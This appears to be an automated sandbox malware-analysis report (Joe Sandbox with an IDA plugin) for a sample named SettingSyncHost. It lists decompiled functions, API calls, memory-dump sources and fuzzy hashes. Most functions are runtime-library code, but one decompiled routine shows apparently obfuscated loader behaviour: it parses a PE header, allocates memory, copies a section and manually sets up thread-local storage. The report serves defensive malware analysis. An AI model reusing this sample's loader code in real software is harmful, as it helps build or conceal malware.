                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,003E1091,?,?,003E1059,?,?,?), ref: 003E10E7
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                      • Opcode ID: 47525964c6d1b3c4e4199e5ccb6972cb99b11ba76894bd0b86e3e429e17fbf16
                                                                                                                                      • Instruction ID: deb38a4f2f2605b10a4148ba4759a0540221f3797a9169fd2d7bf3909be0459c
                                                                                                                                      • Opcode Fuzzy Hash: 47525964c6d1b3c4e4199e5ccb6972cb99b11ba76894bd0b86e3e429e17fbf16
                                                                                                                                      • Instruction Fuzzy Hash: C6F08C316016A9FBCF279B96DD09BAEBA79EB0075AF000061F904A15A0CF748E40DB91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003F5387, Relevance: 7.7, APIs: 5, Instructions: 244COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetCPInfo.KERNEL32(00D279A0,00D279A0,?,7FFFFFFF,?,?,003F5643,00D279A0,00D279A0,?,00D279A0,?,?,?,?,00D279A0), ref: 003F542A
                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 003F54E0
                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 003F5576
                                                                                                                                      • __freea.LIBCMT ref: 003F55E1
                                                                                                                                      • __freea.LIBCMT ref: 003F55ED
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __alloca_probe_16__freea$Info
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2330168043-0
                                                                                                                                      • Opcode ID: dbf0e9286142e1259ba70345d8f6eccbc6b9f2552ff0207ce450796bb8420710
                                                                                                                                      • Instruction ID: 59d9fe5b91280070563be23743e2ec039995fee977c91f436b3cdbb32a94f0c6
                                                                                                                                      • Opcode Fuzzy Hash: dbf0e9286142e1259ba70345d8f6eccbc6b9f2552ff0207ce450796bb8420710
                                                                                                                                      • Instruction Fuzzy Hash: FA81B372D00A5D9BDF239F558841AFEBBFA9F4A310F5A0155EB09EB241E725DC40CBA0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00391BE0, Relevance: 7.7, APIs: 5, Instructions: 230memoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      C-Code - Quality: 29%
                                                                                                                                      			E00391BE0(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				void* _v12;
				intOrPtr _v24;
				intOrPtr _v36;
				intOrPtr _v48;
				intOrPtr* _v60;
				void _v260;
				intOrPtr _t56;
				void* _t57;
				long _t75;
				int _t77;
				void* _t83;
				intOrPtr _t93;
				void* _t117;
				void* _t133;
				void* _t134;
				long long* _t136;
				void* _t137;
				long long* _t138;
				long long* _t140;
				void* _t141;
				long long* _t142;
				void* _t143;
				long long* _t144;
				long long* _t147;
				void* _t148;
				long long* _t149;
				void* _t150;
				long long* _t151;
				void* _t152;
				long long* _t153;
				long long* _t155;
				void* _t156;
				long long* _t157;
				long long _t161;
				long long _t162;
				long long _t163;
				long long _t164;
				long long _t165;
				long long _t166;
				long long _t167;
				long long _t168;
				long long _t169;
				long long _t170;
				long long _t171;

				_t117 = __edx;
				memset( &_v260, 0xcccccccc, 0x40 << 2);
				_v48 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
				_v60 = _a4 +  *((intOrPtr*)(_v48 + 0xc0));
				_t136 = _t134 + 0xc - 8;
				_t161 =  *0x3bbc50;
				 *_t136 = _t161;
				E00393700(_t117);
				 *_t136 = _t161;
				E003935B0(_t117);
				 *_t136 = _t161;
				E00393460(_t117);
				 *_t136 = _t161;
				E00393340();
				st0 = _t161;
				_t137 = _t136 + 8;
				if(_v60 != _a4) {
					_t138 = _t137 - 8;
					_t162 =  *0x3bbc50;
					 *_t138 = _t162;
					E00393700(_t117);
					 *_t138 = _t162;
					E003935B0(_t117);
					 *_t138 = _t162;
					E00393460(_t117);
					 *_t138 = _t162;
					E00393340();
					st0 = _t162;
					_t140 = _t138 + 8 - 8;
					_t163 =  *0x3bbc50;
					 *_t140 = _t163;
					E00393700(_t117);
					 *_t140 = _t163;
					E003935B0(_t117);
					 *_t140 = _t163;
					E00393460(_t117);
					 *_t140 = _t163;
					E00393340();
					st0 = _t163;
					_t141 = _t140 + 8;
					_t56 = _v60;
					_t119 =  *((intOrPtr*)(_t56 + 4)) -  *_v60;
					_t57 = VirtualAlloc(0,  *((intOrPtr*)(_t56 + 4)) -  *_v60, 0x1000, 4);
					__eflags = _t141 - _t141;
					_v12 = E003931A1(_t57, _t141 - _t141);
					_t142 = _t141 - 8;
					_t164 =  *0x3bbc50;
					 *_t142 = _t164;
					E00393700( *((intOrPtr*)(_t56 + 4)) -  *_v60);
					 *_t142 = _t164;
					E003935B0( *((intOrPtr*)(_t56 + 4)) -  *_v60);
					 *_t142 = _t164;
					E00393460(_t119);
					 *_t142 = _t164;
					E00393340();
					st0 = _t164;
					_t143 = _t142 + 8;
					__eflags = _v12;
					if(__eflags != 0) {
						_t144 = _t143 - 8;
						_t165 =  *0x3bbc50;
						 *_t144 = _t165;
						E00393700(_t119);
						 *_t144 = _t165;
						E003935B0(_t119);
						 *_t144 = _t165;
						E00393460(_t119);
						 *_t144 = _t165;
						E00393340();
						st0 = _t165;
						_t122 = _v12;
						E003938C0(_v12,  *_v60,  *((intOrPtr*)(_v60 + 4)) -  *_v60);
						_t147 = _t144 + 0x14 - 8;
						_t166 =  *0x3bbc50;
						 *_t147 = _t166;
						E00393700(_v12);
						 *_t147 = _t166;
						E003935B0(_v12);
						 *_t147 = _t166;
						E00393460(_t122);
						 *_t147 = _t166;
						E00393340();
						st0 = _t166;
						_t148 = _t147 + 8;
						_t75 = TlsAlloc();
						__eflags = _t148 - _t148;
						_t77 = TlsSetValue(E003931A1(_t75, _t148 - _t148), _v12);
						__eflags = _t148 - _t148;
						E003931A1(_t77, _t148 - _t148);
						_t149 = _t148 - 8;
						_t167 =  *0x3bbc50;
						 *_t149 = _t167;
						E00393700(_t122);
						 *_t149 = _t167;
						E003935B0(_t122);
						 *_t149 = _t167;
						E00393460(_t122);
						 *_t149 = _t167;
						E00393340();
						st0 = _t167;
						_t150 = _t149 + 8;
						_t83 = VirtualAlloc(0, 0x1100, 0x1000, 4);
						__eflags = _t150 - _t150;
						_v24 = E003931A1(_t83, _t150 - _t150);
						_t151 = _t150 - 8;
						_t168 =  *0x3bbc50;
						 *_t151 = _t168;
						E00393700(_t122);
						 *_t151 = _t168;
						E003935B0(_t122);
						 *_t151 = _t168;
						E00393460(_t122);
						 *_t151 = _t168;
						_t88 = E00393340();
						st0 = _t168;
						_t152 = _t151 + 8;
						__eflags = _v24;
						if(__eflags != 0) {
							_t153 = _t152 - 8;
							_t169 =  *0x3bbc50;
							 *_t153 = _t169;
							E00393700(_t122);
							 *_t153 = _t169;
							E003935B0(_t122);
							 *_t153 = _t169;
							E00393460(_t122);
							 *_t153 = _t169;
							E00393340();
							st0 = _t169;
							_t93 = _v60;
							_t123 =  *((intOrPtr*)( *((intOrPtr*)(_t93 + 8))));
							_v36 =  *((intOrPtr*)( *((intOrPtr*)(_t93 + 8))));
							_t155 = _t153 + 8 - 8;
							_t170 =  *0x3bbc50;
							 *_t155 = _t170;
							E00393700( *((intOrPtr*)( *((intOrPtr*)(_t93 + 8)))));
							 *_t155 = _t170;
							E003935B0( *((intOrPtr*)( *((intOrPtr*)(_t93 + 8)))));
							 *_t155 = _t170;
							E00393460(_t123);
							 *_t155 = _t170;
							E00393340();
							st0 = _t170;
							_t156 = _t155 + 8;
							__eflags = _v36 - 0xffffffff;
							if(_v36 != 0xffffffff) {
								_v260 = _v36;
							} else {
								_v260 = 0;
							}
							_t124 = _v24;
							 *(_v24 + _v260 * 4) = _v12;
							_t157 = _t156 - 8;
							_t171 =  *0x3bbc50;
							 *_t157 = _t171;
							E00393700(_v24);
							 *_t157 = _t171;
							E003935B0(_t124);
							 *_t157 = _t171;
							E00393460(_t124);
							 *_t157 = _t171;
							E00393340();
							st0 = _t171;
							_t152 = _t157 + 8;
							_t88 = _v24;
							 *[fs:0x2c] = _v24;
						}
					}
				}
				return E003931A1(_t88, _t133 - _t152 + 0x100);
			}















































                                                                                                                                      0x00391be0
                                                                                                                                      0x00391bfc
                                                                                                                                      0x00391c07
                                                                                                                                      0x00391c16
                                                                                                                                      0x00391c19
                                                                                                                                      0x00391c1c
                                                                                                                                      0x00391c22
                                                                                                                                      0x00391c25
                                                                                                                                      0x00391c2a
                                                                                                                                      0x00391c2d
                                                                                                                                      0x00391c32
                                                                                                                                      0x00391c35
                                                                                                                                      0x00391c3a
                                                                                                                                      0x00391c3d
                                                                                                                                      0x00391c42
                                                                                                                                      0x00391c44
                                                                                                                                      0x00391c4d
                                                                                                                                      0x00391c54
                                                                                                                                      0x00391c57
                                                                                                                                      0x00391c5d
                                                                                                                                      0x00391c60
                                                                                                                                      0x00391c65
                                                                                                                                      0x00391c68
                                                                                                                                      0x00391c6d
                                                                                                                                      0x00391c70
                                                                                                                                      0x00391c75
                                                                                                                                      0x00391c78
                                                                                                                                      0x00391c7d
                                                                                                                                      0x00391c82
                                                                                                                                      0x00391c85
                                                                                                                                      0x00391c8b
                                                                                                                                      0x00391c8e
                                                                                                                                      0x00391c93
                                                                                                                                      0x00391c96
                                                                                                                                      0x00391c9b
                                                                                                                                      0x00391c9e
                                                                                                                                      0x00391ca3
                                                                                                                                      0x00391ca6
                                                                                                                                      0x00391cab
                                                                                                                                      0x00391cad
                                                                                                                                      0x00391cb9
                                                                                                                                      0x00391cc2
                                                                                                                                      0x00391cc7
                                                                                                                                      0x00391ccd
                                                                                                                                      0x00391cd4
                                                                                                                                      0x00391cd7
                                                                                                                                      0x00391cda
                                                                                                                                      0x00391ce0
                                                                                                                                      0x00391ce3
                                                                                                                                      0x00391ce8
                                                                                                                                      0x00391ceb
                                                                                                                                      0x00391cf0
                                                                                                                                      0x00391cf3
                                                                                                                                      0x00391cf8
                                                                                                                                      0x00391cfb
                                                                                                                                      0x00391d00
                                                                                                                                      0x00391d02
                                                                                                                                      0x00391d05
                                                                                                                                      0x00391d09
                                                                                                                                      0x00391d10
                                                                                                                                      0x00391d13
                                                                                                                                      0x00391d19
                                                                                                                                      0x00391d1c
                                                                                                                                      0x00391d21
                                                                                                                                      0x00391d24
                                                                                                                                      0x00391d29
                                                                                                                                      0x00391d2c
                                                                                                                                      0x00391d31
                                                                                                                                      0x00391d34
                                                                                                                                      0x00391d39
                                                                                                                                      0x00391d50
                                                                                                                                      0x00391d54
                                                                                                                                      0x00391d5c
                                                                                                                                      0x00391d5f
                                                                                                                                      0x00391d65
                                                                                                                                      0x00391d68
                                                                                                                                      0x00391d6d
                                                                                                                                      0x00391d70
                                                                                                                                      0x00391d75
                                                                                                                                      0x00391d78
                                                                                                                                      0x00391d7d
                                                                                                                                      0x00391d80
                                                                                                                                      0x00391d85
                                                                                                                                      0x00391d87
                                                                                                                                      0x00391d92
                                                                                                                                      0x00391d98
                                                                                                                                      0x00391da0
                                                                                                                                      0x00391da6
                                                                                                                                      0x00391da8
                                                                                                                                      0x00391dad
                                                                                                                                      0x00391db0
                                                                                                                                      0x00391db6
                                                                                                                                      0x00391db9
                                                                                                                                      0x00391dbe
                                                                                                                                      0x00391dc1
                                                                                                                                      0x00391dc6
                                                                                                                                      0x00391dc9
                                                                                                                                      0x00391dce
                                                                                                                                      0x00391dd1
                                                                                                                                      0x00391dd6
                                                                                                                                      0x00391dd8
                                                                                                                                      0x00391deb
                                                                                                                                      0x00391df1
                                                                                                                                      0x00391df8
                                                                                                                                      0x00391dfb
                                                                                                                                      0x00391dfe
                                                                                                                                      0x00391e04
                                                                                                                                      0x00391e07
                                                                                                                                      0x00391e0c
                                                                                                                                      0x00391e0f
                                                                                                                                      0x00391e14
                                                                                                                                      0x00391e17
                                                                                                                                      0x00391e1c
                                                                                                                                      0x00391e1f
                                                                                                                                      0x00391e24
                                                                                                                                      0x00391e26
                                                                                                                                      0x00391e29
                                                                                                                                      0x00391e2d
                                                                                                                                      0x00391e34
                                                                                                                                      0x00391e37
                                                                                                                                      0x00391e3d
                                                                                                                                      0x00391e40
                                                                                                                                      0x00391e45
                                                                                                                                      0x00391e48
                                                                                                                                      0x00391e4d
                                                                                                                                      0x00391e50
                                                                                                                                      0x00391e55
                                                                                                                                      0x00391e58
                                                                                                                                      0x00391e5d
                                                                                                                                      0x00391e62
                                                                                                                                      0x00391e68
                                                                                                                                      0x00391e6a
                                                                                                                                      0x00391e6d
                                                                                                                                      0x00391e70
                                                                                                                                      0x00391e76
                                                                                                                                      0x00391e79
                                                                                                                                      0x00391e7e
                                                                                                                                      0x00391e81
                                                                                                                                      0x00391e86
                                                                                                                                      0x00391e89
                                                                                                                                      0x00391e8e
                                                                                                                                      0x00391e91
                                                                                                                                      0x00391e96
                                                                                                                                      0x00391e98
                                                                                                                                      0x00391e9b
                                                                                                                                      0x00391e9f
                                                                                                                                      0x00391eb0
                                                                                                                                      0x00391ea1
                                                                                                                                      0x00391ea1
                                                                                                                                      0x00391ea1
                                                                                                                                      0x00391ebc
                                                                                                                                      0x00391ec2
                                                                                                                                      0x00391ec5
                                                                                                                                      0x00391ec8
                                                                                                                                      0x00391ece
                                                                                                                                      0x00391ed1
                                                                                                                                      0x00391ed6
                                                                                                                                      0x00391ed9
                                                                                                                                      0x00391ede
                                                                                                                                      0x00391ee1
                                                                                                                                      0x00391ee6
                                                                                                                                      0x00391ee9
                                                                                                                                      0x00391eee
                                                                                                                                      0x00391ef0
                                                                                                                                      0x00391ef3
                                                                                                                                      0x00391ef6
                                                                                                                                      0x00391ef6
                                                                                                                                      0x00391e2d
                                                                                                                                      0x00391d09
                                                                                                                                      0x00391f0f

                                                                                                                                      APIs
                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00391CC7
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                      • Opcode ID: fc8a0a5c2f8a6054c415fd6d6f5c0f77b7745f74db55b6bf7dd844f0c171f49a
                                                                                                                                      • Instruction ID: 2521e125eb41a215d271b9e743bb49becb72724417120ea06f47e574675f5378
                                                                                                                                      • Opcode Fuzzy Hash: fc8a0a5c2f8a6054c415fd6d6f5c0f77b7745f74db55b6bf7dd844f0c171f49a
                                                                                                                                      • Instruction Fuzzy Hash: CD8131B0908509DBCF06BF68E88A5ACFFB0FF48755F1149A4F4C45A2A1DF314A68C75A
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003EF6EA, Relevance: 7.7, APIs: 5, Instructions: 199COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 003EF76E
                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 003EF834
                                                                                                                                      • __freea.LIBCMT ref: 003EF8A0
                                                                                                                                        • Part of subcall function 003E5CF9: RtlAllocateHeap.NTDLL(00000000,?,?,?,003DB376,?,?,?,00000000,?,003CB0A7,?,?,?), ref: 003E5D2B
                                                                                                                                      • __freea.LIBCMT ref: 003EF8A9
                                                                                                                                      • __freea.LIBCMT ref: 003EF8CC
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1423051803-0
                                                                                                                                      • Opcode ID: b4096b3a7d7b79fc456e4abfadbfb53a8b35114642d473ea2390d7fd3be76d62
                                                                                                                                      • Instruction ID: 8d8595329de8d5eca9a3cdaa83a89d7bda359e7405ad1b20191c657336052bc4
                                                                                                                                      • Opcode Fuzzy Hash: b4096b3a7d7b79fc456e4abfadbfb53a8b35114642d473ea2390d7fd3be76d62
                                                                                                                                      • Instruction Fuzzy Hash: D251B4725006A6AFEF265E569C41EBB37A9EF44750F160339F908AB280E7B0DD108660
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003E28D8, Relevance: 7.7, APIs: 5, Instructions: 186COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003E5CF9: RtlAllocateHeap.NTDLL(00000000,?,?,?,003DB376,?,?,?,00000000,?,003CB0A7,?,?,?), ref: 003E5D2B
                                                                                                                                      • _free.LIBCMT ref: 003E29E7
                                                                                                                                      • _free.LIBCMT ref: 003E29FE
                                                                                                                                      • _free.LIBCMT ref: 003E2A1B
                                                                                                                                      • _free.LIBCMT ref: 003E2A36
                                                                                                                                      • _free.LIBCMT ref: 003E2A4D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free$AllocateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3033488037-0
                                                                                                                                      • Opcode ID: 443f79d4449b1d4d812d70fef5774dabe1e83769fc5d7c12c35bdf9dc912c655
                                                                                                                                      • Instruction ID: e5a250722f00fb3d5b104255ce84f63855d8d9ff0e1cf94a7dc9431cfdafe729
                                                                                                                                      • Opcode Fuzzy Hash: 443f79d4449b1d4d812d70fef5774dabe1e83769fc5d7c12c35bdf9dc912c655
                                                                                                                                      • Instruction Fuzzy Hash: 0351C572A007549FDB22DF2ACC41A6BB7F8EF58724F154669E805DB2D1E731E901CB50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003D3900, Relevance: 7.6, APIs: 5, Instructions: 107COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003D3936
                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003D3956
                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003D3976
                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 003D3A11
                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003D3A29
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 459529453-0
                                                                                                                                      • Opcode ID: 3a5148b6b2ce94c2f135b9023b4fc4c04c8cebed7ba1097c01e9243c0b4e9e13
                                                                                                                                      • Instruction ID: c0b342e4f91f0ca095b5fb36488668267ecc4c7ee10be2fafa12bb0f1535fd41
                                                                                                                                      • Opcode Fuzzy Hash: 3a5148b6b2ce94c2f135b9023b4fc4c04c8cebed7ba1097c01e9243c0b4e9e13
                                                                                                                                      • Instruction Fuzzy Hash: 7041B1B2A04215CFCB12DF94E991B6EB7B4FB04710F11416EE846AB381DB71AE05CB82
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 0039F4AA, Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                      			E0039F4AA(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				long _t27;
				signed int _t34;
				signed int _t36;
				signed char _t42;
				intOrPtr* _t46;
				void* _t49;
				signed int _t56;
				void* _t57;

				_t55 = __esi;
				_t49 = __edx;
				_push(0xc);
				_push(0x3c5f90);
				E0039A560(__ebx, __edi, __esi);
				 *(_t57 - 0x1c) = 0;
				_t42 = 0;
				if(( *(_t57 + 0xc) & 0x00000008) != 0) {
					_t42 = 0x20;
				}
				if(( *(_t57 + 0xc) & 0x00004000) != 0) {
					_t42 = _t42 | 0x00000080;
				}
				if(( *(_t57 + 0xc) & 0x00000080) != 0) {
					_t42 = _t42 | 0x00000010;
				}
				_t27 = GetFileType( *(_t57 + 8));
				if(_t27 != 0) {
					__eflags = _t27 - 2;
					if(__eflags != 0) {
						__eflags = _t27 - 3;
						if(__eflags == 0) {
							_t42 = _t42 | 0x00000008;
							__eflags = _t42;
						}
					} else {
						_t42 = _t42 | 0x00000040;
					}
					_t56 = E0039F311(_t42, _t49, 0, _t55, __eflags);
					 *(_t57 + 0xc) = _t56;
					__eflags = _t56 - 0xffffffff;
					if(__eflags != 0) {
						 *((intOrPtr*)(_t57 - 4)) = 0;
						E0039F0DB(_t42, _t56,  *(_t57 + 8));
						_t46 = 0x4ee8c0 + (_t56 >> 5) * 4;
						_t34 = (_t56 & 0x0000001f) << 6;
						 *( *_t46 + _t34 + 4) = _t42 | 0x00000001;
						 *( *_t46 + _t34 + 0x24) =  *( *_t46 + _t34 + 0x24) & 0x00000080;
						 *( *_t46 + _t34 + 0x24) =  *( *_t46 + _t34 + 0x24) & 0x0000007f;
						 *(_t57 - 0x1c) = 1;
						 *((intOrPtr*)(_t57 - 4)) = 0xfffffffe;
						_t36 = E0039F598(0, _t56);
						__eflags =  *(_t57 - 0x1c);
						if( *(_t57 - 0x1c) == 0) {
							goto L8;
						}
						_t37 = _t56;
						goto L9;
					} else {
						 *((intOrPtr*)(E0039960F(__eflags))) = 0x18;
						_t36 = E00399622(__eflags);
						 *_t36 = 0;
						goto L8;
					}
				} else {
					_t36 = E00399635(GetLastError());
					L8:
					_t37 = _t36 | 0xffffffff;
					L9:
					return E0039A5A5(_t37);
				}
			}











                                                                                                                                      0x0039f4aa
                                                                                                                                      0x0039f4aa
                                                                                                                                      0x0039f4aa
                                                                                                                                      0x0039f4ac
                                                                                                                                      0x0039f4b1
                                                                                                                                      0x0039f4b8
                                                                                                                                      0x0039f4bb
                                                                                                                                      0x0039f4c1
                                                                                                                                      0x0039f4c3
                                                                                                                                      0x0039f4c3
                                                                                                                                      0x0039f4cd
                                                                                                                                      0x0039f4cf
                                                                                                                                      0x0039f4cf
                                                                                                                                      0x0039f4d6
                                                                                                                                      0x0039f4d8
                                                                                                                                      0x0039f4d8
                                                                                                                                      0x0039f4de
                                                                                                                                      0x0039f4e6
                                                                                                                                      0x0039f4fe
                                                                                                                                      0x0039f501
                                                                                                                                      0x0039f508
                                                                                                                                      0x0039f50b
                                                                                                                                      0x0039f50d
                                                                                                                                      0x0039f50d
                                                                                                                                      0x0039f50d
                                                                                                                                      0x0039f503
                                                                                                                                      0x0039f503
                                                                                                                                      0x0039f503
                                                                                                                                      0x0039f515
                                                                                                                                      0x0039f517
                                                                                                                                      0x0039f51a
                                                                                                                                      0x0039f51d
                                                                                                                                      0x0039f533
                                                                                                                                      0x0039f53a
                                                                                                                                      0x0039f549
                                                                                                                                      0x0039f555
                                                                                                                                      0x0039f55a
                                                                                                                                      0x0039f564
                                                                                                                                      0x0039f56d
                                                                                                                                      0x0039f570
                                                                                                                                      0x0039f577
                                                                                                                                      0x0039f57e
                                                                                                                                      0x0039f583
